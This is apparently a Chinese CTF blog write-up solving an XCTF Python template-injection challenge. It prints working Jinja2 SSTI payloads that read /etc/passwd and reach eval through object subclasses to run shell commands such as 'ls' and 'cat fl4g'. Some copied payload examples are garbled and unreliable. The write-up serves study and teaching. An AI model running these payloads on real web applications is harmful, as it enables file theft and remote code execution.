Web_python_template_injection WP以及对于python模板注入的思考

26672

开局就懵逼,查了一堆资料也还是一知半解,先把参考内容放在前面,python学习得提上日程了。

三位大牛的链接,后续参考用:

https://blog.csdn.net/iamsongyu/article/details/85861811

https://www.cnblogs.com/wfzWebSecuity/p/9415641.html

https://xz.aliyun.com/t/2908

解题:

图片[1]-Web_python_template_injection WP以及对于python模板注入的思考-魔法少女雪殇

开局一个这东西,虽然提示特别明显,但是我不会。

url后面输入{{1+1}}

图片[2]-Web_python_template_injection WP以及对于python模板注入的思考-魔法少女雪殇

出现了1+1=2的情况

后续就参考学习了前面的链接内容

获得如下关键字:

图片[3]-Web_python_template_injection WP以及对于python模板注入的思考-魔法少女雪殇

举几个例子:

读文件

    ().class.bases[0].subclasses()40.read()

写文件

    ().class.bases[0].subclasses()40.write(‘123’)

执行任意命令

    ().class.bases[0].subclasses()[59].init.func_globals.values()[13]‘eval’.read()’ )

说实话看不懂

照葫芦画瓢写payload吧

构筑:{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}

获得用户名密码信息:

图片[4]-Web_python_template_injection WP以及对于python模板注入的思考-魔法少女雪殇

接下来就是遍历找flag。。。(不会python真难写

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}  
  {% if b.__class__ == {}.__class__ %}         //遍历基类 找到eval函数
    {% if 'eval' in b.keys() %}    //找到了
      {{ b['eval']('__import__("os").popen("ls").read()') }}  //导入cmd 执行popen里的命令 read读出数据
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

执行后:

图片[5]-Web_python_template_injection WP以及对于python模板注入的思考-魔法少女雪殇

嗯,将上述eval语句内的ls替换成cat fl4g即可

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}  
  {% if b.__class__ == {}.__class__ %}         //遍历基类 找到eval函数
    {% if 'eval' in b.keys() %}    //找到了
      {{ b['eval']('__import__("os").popen("cat fl4g").read()') }} 
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
图片[6]-Web_python_template_injection WP以及对于python模板注入的思考-魔法少女雪殇

获得flag。。。。

看来后续没准会有更花的活。。。这次比赛结束后抓紧学python了。。

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
CTFWPWEB笔记
# web# XCTF
喜欢就支持一下吧
点赞2 分享
魔法少女雪殇的头像-魔法少女雪殇钻石会员
AntCTF x D^3CTF 个人Write Up-魔法少女雪殇
AntCTF x D^3CTF 个人Write Up
AntCTF x D^3CTF 个人Write Up
3年前 11.6W+
Goerli与Sepolia,mumbai测试币领取-魔法少女雪殇
Goerli与Sepolia,mumbai测试币领取
Goerli与Sepolia,mumbai测试币领取
2年前 5932
CISCN2021 初赛 Write UP-魔法少女雪殇
CISCN2021 初赛 Write UP
CISCN2021 初赛 Write UP
3年前 5753
开源CTF平台踩坑与评价(更新了两个平台)-魔法少女雪殇
开源CTF平台踩坑与评价(更新了两个平台)
开源CTF平台踩坑与评价(更新了两个平台)
3年前 4750
陇剑杯 个人 ’WriteUp‘-魔法少女雪殇
陇剑杯 个人 ’WriteUp‘
陇剑杯 个人 ’WriteUp‘
3年前 4536
红帽杯2021 Write UP-魔法少女雪殇
红帽杯2021 Write UP
红帽杯2021 Write UP
3年前 4188
相关推荐
AntCTF x D^3CTF 个人Write Up-魔法少女雪殇
AntCTF x D^3CTF 个人Write Up
AntCTF x D^3CTF 个人Write Up
3年前 11.6W+
CISCN2021 初赛 Write UP-魔法少女雪殇
CISCN2021 初赛 Write UP
CISCN2021 初赛 Write UP
3年前 5753
陇剑杯 个人 ’WriteUp‘-魔法少女雪殇
陇剑杯 个人 ’WriteUp‘
陇剑杯 个人 ’WriteUp‘
3年前 4536
红帽杯2021 Write UP-魔法少女雪殇
红帽杯2021 Write UP
红帽杯2021 Write UP
3年前 4188
首届网刃杯工控ctf WriteUp-魔法少女雪殇
首届网刃杯工控ctf WriteUp
首届网刃杯工控ctf WriteUp
3年前 2889
VNCTF2021 WriteUp-魔法少女雪殇
VNCTF2021 WriteUp
VNCTF2021 WriteUp
3年前 2360
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
CF1.0 商城改gp-魔法少女雪殇

1CF1.0 商城改gp

魔法少女雪殇的头像-魔法少女雪殇钻石会员26天前
75
HOW TO START TEAMSPEAK-魔法少女雪殇

2HOW TO START TEAMSPEAK

魔法少女雪殇的头像-魔法少女雪殇钻石会员1个月前
82
2022祥云杯决赛 misc Twin Shadow题解-魔法少女雪殇

32022祥云杯决赛 misc Twin Shadow题解

魔法少女雪殇的头像-魔法少女雪殇钻石会员7个月前
619
StegLab QA and EXP-魔法少女雪殇

4StegLab QA and EXP

魔法少女雪殇的头像-魔法少女雪殇钻石会员8个月前
346
StegLab解答与心得记录以及问题反思-魔法少女雪殇

5StegLab解答与心得记录以及问题反思

魔法少女雪殇的头像-魔法少女雪殇钻石会员8个月前
713
LLM-CHATGLM-AI学习资料自用-魔法少女雪殇

6LLM-CHATGLM-AI学习资料自用(持续更新)

魔法少女雪殇的头像-魔法少女雪殇钻石会员9个月前
964